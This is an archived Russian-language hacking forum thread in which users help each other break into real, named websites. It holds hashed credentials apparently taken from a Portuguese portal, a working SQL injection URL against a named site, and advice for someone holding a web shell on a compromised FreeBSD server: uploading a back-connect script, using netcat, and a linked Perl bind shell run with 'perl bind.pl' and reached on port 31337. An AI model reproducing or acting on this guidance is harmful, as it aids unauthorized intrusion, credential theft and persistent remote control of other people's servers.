ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.06.2010, 17:48
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
Привет! Попался мне тут портальчик на португальском языке и есть табличка с полями*значениями
usr_frase*usr_senha:
606715696665bada*3f886c5806f6861b
606715696665bada*672e2ebf3645a3bc
606715696665bada*3f886c5806f6861b
606717496665bcba*2d793cff37fd171b
Это, как я понял пары логин*пароль. Причём первая часть неизменна у разных пользователей (за редким исключением), а вторая меняется.
Есть у кого мысли как расшифровать?
UPD. Гугл сказал, что первая часть попадается тут: http://emsmat.sev.gob.mx/claves.php
Последний раз редактировалось qq6ka; 04.06.2010 в 17:56..
|
|
|
04.06.2010, 17:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
qq6ka
это хеши mysql
click |
|
|
|
04.06.2010, 17:57
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
А я дебил. Усложняю себе жизнь. Спасибо.
|
|
|
|
04.06.2010, 19:54
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.musicandmeaning.net/fora/view_post.php?postid=2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7+limit+1,1--+
|
|
|
|
04.06.2010, 20:20
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
есть шелл на системе freebsd 7.2, нужен бекконект
дальше /usr/local/www не пускает -"Can't open this folder!"
Помогите пожалуйста
|
|
|
|
04.06.2010, 20:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от wkar
есть шелл на системе freebsd 7.2, нужен бекконект
дальше /usr/local/www не пускает -"Can't open this folder!"
Помогите пожалуйста
пробовал сразу в папку /tmp/ прыгнуть?
|
|
|
|
04.06.2010, 20:25
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от Gorev
пробовал сразу в папку /tmp/ прыгнуть?
да, cd /tmp/ не пашет..
|
|
|
|
04.06.2010, 20:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от wkar
есть шелл на системе freebsd 7.2, нужен бекконект
дальше /usr/local/www не пускает -"Can't open this folder!"
Помогите пожалуйста
какая связь между тем куда пускает/не пускает и бекконектом? Шелл лежит же в папке, доступной на запись? В пределах /usr/local/www есть хоть одна папка, доступная на запись? Ну и залей туда скрипт бекконекта и запусти.
Или просто netcat-ом, если доступен в консоли
https://forum.antichat.net/thread200753.html
И сам сплойт необязательно запускать из /tmp
и вообще поюзай поиск по сайту, всё тут есть
Последний раз редактировалось Pashkela; 04.06.2010 в 20:36..
|
|
|
|
04.06.2010, 20:43
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от Pashkela
какая связь между тем куда пускает/не пускает и бекконектом? Шелл лежит же в папке, доступной на запись? В пределах /usr/local/www есть хоть одна папка, доступная на запись? Ну и залей туда скрипт бекконекта и запусти.
Или просто netcat-ом, если доступен в консоли
https://forum.antichat.net/thread200753.html
И сам сплойт необязательно запускать из /tmp
и вообще поюзай поиск по сайту, всё тут есть
права на папку с которой запускаю бк drwxrwxrwx
бк юзал шелла ВСО и этот http://fsb-my.name/c/apache-handler - 0 реакции
Скажи как, а то я почти не знаю неткат-а
ПС
Когда-то уже делал бк из под темп, но после того как админ подшаманил нет доступа к /
ППС
мб фаервол мешает?
|
|
|
|
04.06.2010, 20:49
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от wkar
права на папку с которой запускаю бк drwxrwxrwx
бк юзал шелла ВСО и этот http://fsb-my.name/c/apache-handler - 0 реакции
Скажи как, а то я почти не знаю неткат-а
ПС
Когда-то уже делал бк из под темп, но после того как админ подшаманил нет доступа к /
ППС
мб фаервол мешает?
а как ты делаешь бекконнект? без нетката то? какой утилитой пользуешся?
http://uasc.org.ua/files/backdoor.pl.txt
вот тебе перловый биндшелл..меня много раз спасал когда всо не срабатывал, на серванте в шелле пишешь
perl bind.pl
у себя запускаешь неткат и пишешЬ nc 127.0.0.1 31337
вместо локалхоста пишешь айпишник серванта...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
